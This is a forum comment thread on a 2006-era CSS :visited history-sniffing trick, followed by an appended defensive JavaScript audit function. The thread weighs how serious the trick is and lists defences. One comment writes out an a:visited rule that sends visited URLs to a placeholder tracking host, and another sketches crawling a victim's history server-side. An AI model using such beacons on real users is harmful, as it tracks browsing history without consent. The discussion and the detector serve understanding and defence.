Warning: The Content in this Article May be Inaccurate
Readers have reported that this story contains information that may not be accurate.
158 Comments
- Dakana, on 10/12/2007, -3/+48
Buried as inaccurate.
It doesn't search your history; it checks to see if you've been to the listed sites.
- radiofrequency, on 10/12/2007, -6/+48
That's frikkin' genius. He's writing links to popular websites in the document and checking to see if the links are the color of a visited link. I wish I were that cutting edge.
- stratedge, on 10/12/2007, -3/+40
It's a neat trick, but the title of both this and the original article are totally misleading. It's not reading your history, it's just testing if you've been to any of a list of web sites. HUGE DIFFERENCE. For me, using firefox, it did not find any sites I had been to.
Again, I don't deny that it's neat, but it's not nearly as good an 'exploit' as the author claims with his title.
- sepi, on 10/12/2007, -5/+38
a direct link to the JavaScript trick (bypassing the blog link):
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
- ccanni1028, on 10/12/2007, -3/+25
"but I strongly think that MS is great because they are VERY fast at releasing code fixes and updates."
Where have you been living? Unless the update is CRITICAL to them (and not even always then), it won't be released until the second Tuesday of the month, when they do their bulk Windows Update release.
- nevenmrgan, on 10/12/2007, -3/+25
Wow. According to this groundbreaking tool, I've been to
http://www.google.com/
Ya think?
- DerGeist, on 10/12/2007, -0/+20
IE7 RC1 doesn't "block" the site, the Javascript is written to only perform the so-called "exploit" (and I use the term loosely) on mozilla-based browsers.
IE7 would be just as susceptible.
- doctornkul, on 10/12/2007, -1/+20
The downside of the trick is that it'll only show a site if you went to the root of the site (didn't name any files or folders). This means that the exploit won't register:
1) Many google searches (and therefore searches typed into the address bar) that automatically link to a non-root page
2) Most links that you follow - chances are that they won't link to amazon.com, but rather something like amazon.com/exec/obiodo..., which won't be registered. None of the digg links you follow will be registered.
Basically the only websites it will register are the ones you type into the address bar and those with google search results pointing to the root. That leaves a very large hole, especially for people who surf like me, typing website names into the address bar instead of actually typing .com every time, and actually jumping from website to website more frequently through links than through typing the address.
Also, the algorithm is also very inefficient. For one it needs to try each and every one of the websites that it's looking for, which may mean thousands or more if it wants to be complete. This, however, means that if a website is not in its database, it won't find it. And I won't even go into how bad searching for all permutations is. The good side for the exploiter is that it all happens on the client computer, so it's not so CPU-intensive for them.
I would say that this "exploit" is roughly as serious as a tracking cookie when used realistically, and the best way to avoid this is to simply not allow CSS to look at link colors (by this I mean that the standards should be changed). I'm more of a programmer than a web developer, but I don't think that the ability to look at link colors is very necessary. Perhaps somebody more experienced can tell me why web developers need that feature.
- kimos, on 10/12/2007, -0/+18
Amazes me that people still can't figure out the difference between Java and JavaScript...
- gordonchiam, on 10/12/2007, -10/+28
very clever trick
- Prometheus, on 10/12/2007, -2/+19
It knows I've been to google.com! That narrows down my identity!
- MajorD, on 10/12/2007, -2/+18
"You have not been to http://www.digg.com/"
hmm.
- merreborn, on 10/12/2007, -0/+14
When this got frontpaged a couple days ago, someone pointed out there's been a bug report on this in Mozilla's bug database since 2002.
- inactive, on 10/12/2007, -2/+16
I agree, clever, but the title is misleading. I thought it was gonna hack into your chrome:// somehow, not just be a list of popular sites.
- weird0science, on 10/12/2007, -4/+18
I use NOSCRIPT extension. Stops this type of thing from happening.
https://addons.mozilla.org/firefox/722/
- ilovenicotine, on 10/12/2007, -0/+12
SafeHistory
https://addons.mozilla.org/firefox/1502/
Makes it so websites only see the history from their domain
- MrViklund, on 10/12/2007, -6/+17
@Pkkid
"I strongly think that MS is great because they are VERY fast at releasing code fixes and updates."
Haha are you joking?
- Daiken, on 10/12/2007, -5/+14
lol, how stupid. Nothing came up for me. Marked as inaccurate.
- tehJR, on 10/12/2007, -2/+11
and I've been to www.cnn.com
Alert the internets...
- Markie1006, on 10/12/2007, -2/+11
it's not really accessing the history as such, just checking against its own 'known list'.
If you have something in your history that is not in the known list, it won't appear.
i.e. I have a ton of entries in my history, and it only managed to show one - slashdot.
Marked as inaccurate AND a dupe. (if only I could).
- crazaalex, on 10/12/2007, -7/+15
Won't work if you have noscript extension.
- iNoles, on 10/12/2007, -5/+13
I tried it in Bon Echo Beta 2; it shows nothing to display.
Marked as inaccurate.
- cryptoknight, on 10/12/2007, -3/+11
I have browser history set to 0 in my firefox settings and this site finds no history for me. why do you need browser history anyways, isn't that what bookmarks are for?
- scottschiller, on 10/12/2007, -0/+8
Just to play devil's advocate here, you could do something like
a:visited {
  background-image:url(http://whatever/track.php?url=someURLHere);
}
.. You'd have to disable CSS, regrettably, for that one to be blocked. ;)
- nofxjunkee, on 10/12/2007, -0/+8
No, bookmarks are for saving certain sites you're sure you want to read again in the future. The history is for when you go "oh *****, now which one of the 100 sites I visited in the last few days was this specific piece of information on?"
- ccanni1028, on 10/12/2007, -3/+10
I don't have my history saved. It stops things like this from happening.
- tizz66, on 10/12/2007, -11/+18
It's not really a browser hack anyway, it's more a standards hack. Ironically IE isn't affected (by this code anyway, not including ports) because it doesn't support the standard properly.
- CedEx, on 10/12/2007, -1/+8
It's really going to suck for him if I don't visit any of those sites he's painstakingly typed into his code.
- 0siris, on 10/12/2007, -5/+12
No it doesn't... millions of people every day use google across the countr-...
wait, you were kidding...
I knew that.
Carry On.
- PolyVector, on 10/12/2007, -1/+8
of course it doesn't work in IE... didn't anybody notice the "if (is_mozilla)" line? maybe I'm missing something here?
- ghostbyte, on 10/12/2007, -0/+6
:visited support allows queries into global history
Posted 2002-05-28 This has been around for a long time.
https://bugzilla.mozilla.org/show_bug.cgi?id=147777
- br0ck, on 10/12/2007, -1/+7
@MajorD - Look up in your address bar and notice you are NOT at WWW.digg.com. Try http://digg.com ... worked for me.
- nofxjunkee, on 10/12/2007, -0/+6
It does in FF 2 beta 1 here on my Mac.
- kimos, on 10/12/2007, -2/+8
@ilovenicotine
Sorry, I didn't quite catch what you said.
What about exploiting your ass?
- NiLeS, on 10/12/2007, -0/+6
@ doctornkul :
Changing link colors is useful if I change the text background. When I have a blue background, I still want you to see the links, say by changing from blue to white.
- mc7winkie, on 10/12/2007, -5/+11
Stop post spamming. Period.
- Markie1006, on 10/12/2007, -6/+12
I would help you out and send the internet to you on a disk, but I think the tubes are clogged on my end.
- loneBoat, on 10/12/2007, -1/+6
Heh-heh. I have FF set to clear my cache every time I close it, so when I tried it, it said:
"I know where you've been: www.google.com"
Google is my homepage, so whoo boy, I'm really scared now! You know I've been to google.com!
Okay, bury me. I just thought it was funny...
- SweetsGreen, on 10/12/2007, -4/+9
so all I'd have to do is modify the websites[] array to contain every site ever and I'd have something useful.
- SteelChicken, on 10/12/2007, -1/+6
agreed. if it doesn't scan for a particular URL, it won't show up.
a neat hack, but hardly awe-inspiring.
- br0ck, on 10/12/2007, -1/+6
@mojaam - noscript lets you whitelist sites to allow javascript one time or permanently.
- nicerobot, on 10/12/2007, -0/+5
How about an extension of this technique. If it finds sites in your history, send them to the server (hurray for AJAX), the server can get all the links from the page, send the links back to the client and process them the same way. Now it can crawl your history.
- Moskie, on 10/12/2007, -0/+5
how would you actually populate the 'someURLHere' value?
- duodave, on 10/12/2007, -1/+6
I'm not impressed. Now, if he had somehow linked this to a DNS server, then I'd be impressed. As it is, it only showed me four sites I'd visited, and very common ones at that.
- LuTze, on 10/12/2007, -0/+5
The summary is misleading and inaccurate. The hack had not been ported to work on IE. If you read the comments below on
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
There is a working port for IE, which "picks up the history" from IE7RC1. Not really a case about IE7RC1 being "smart".
- Otto, on 10/12/2007, -0/+5
doctornkul: As a proof of concept though, it's still interesting. Basically he's not checking the history at all, he's creating a hidden table with links to all the sites, and setting a visited style on each one with a different color, then checking for colors of the resulting hidden links. Slow, yes, but it might get somebody else thinking and find a real hole there.
- Splitt3rxx, on 10/12/2007, -1/+5
I take back what is said, how ***** ironic
http://img.photobucket.com/albums/v116/guinea_pig_slave/operacrash5.png
- KnightMareInc, on 10/12/2007, -2/+6
is the history sent to him or is this just LOL your IP is $ip
- miken32, on 10/12/2007, -0/+4
Probably mentioned in the other duplicate stories, but this is not new.
http://www.w3.org/TR/CSS21/selector.html#link-pseudo-classes
"Note. It is possible for style sheet authors to abuse the :link and :visited pseudo-classes to determine which sites a user has visited without the user's consent.
UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user's privacy while rendering visited and unvisited links differently."
- inactive, on 10/12/2007, -1/+5
Yes, apparently what we're missing is an obfuscated attempt to discredit FF....
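The a:visited rule with a background-image URL that scottschiller posts above, and the CSS 2.1 note miken32 quotes, point to a check a site can run on stylesheets it did not write. This is an added example, not code from the thread or the linked article: findVisitedLeaks, COLOR_ONLY and the sample stylesheet are hypothetical names and constructed input, and the allow-list of color properties is an assumption taken from current browser behaviour rather than from this page.

```javascript
// Added example: audit a stylesheet for :visited rules that can leak history.
// COLOR_ONLY is the set of properties current browsers still apply to :visited
// (assumption from browser documentation, not from this thread).
const COLOR_ONLY = new Set([
  'color', 'background-color', 'border-color', 'border-top-color',
  'border-right-color', 'border-bottom-color', 'border-left-color',
  'outline-color', 'column-rule-color', 'text-decoration-color',
  'text-emphasis-color', 'fill', 'stroke',
]);

function findVisitedLeaks(cssText) {
  const findings = [];
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments
  // Flat rules only: "selector-list { declarations }" (nested at-rules not handled).
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selectors = m[1].split(',').map(s => s.trim())
      .filter(s => /:visited\b/i.test(s));
    if (selectors.length === 0) continue;
    for (const decl of m[2].split(';')) {
      const idx = decl.indexOf(':');
      if (idx < 0) continue;
      const property = decl.slice(0, idx).trim().toLowerCase();
      const value = decl.slice(idx + 1).trim();
      let reason = null;
      if (/url\s*\(/i.test(value)) {
        reason = 'request is sent only when the link is visited';
      } else if (!COLOR_ONLY.has(property)) {
        reason = 'non-color property changes layout that script can measure';
      }
      if (reason) findings.push({ selector: selectors.join(', '), property, value, reason });
    }
  }
  return findings;
}

// Constructed sample; the first rule has the shape quoted in the thread.
const SAMPLE_CSS = `
a:visited { background-image:url(http://whatever/track.php?url=someURLHere); }
a:link, a:visited { color: #609; }
#nav a:visited { display: none; color: red }
/* a:visited { width: 1px } */
`;

console.log(findVisitedLeaks(SAMPLE_CSS));
```

On the sample it reports the background-image rule and the display rule, and leaves the plain color rules and the commented-out rule alone.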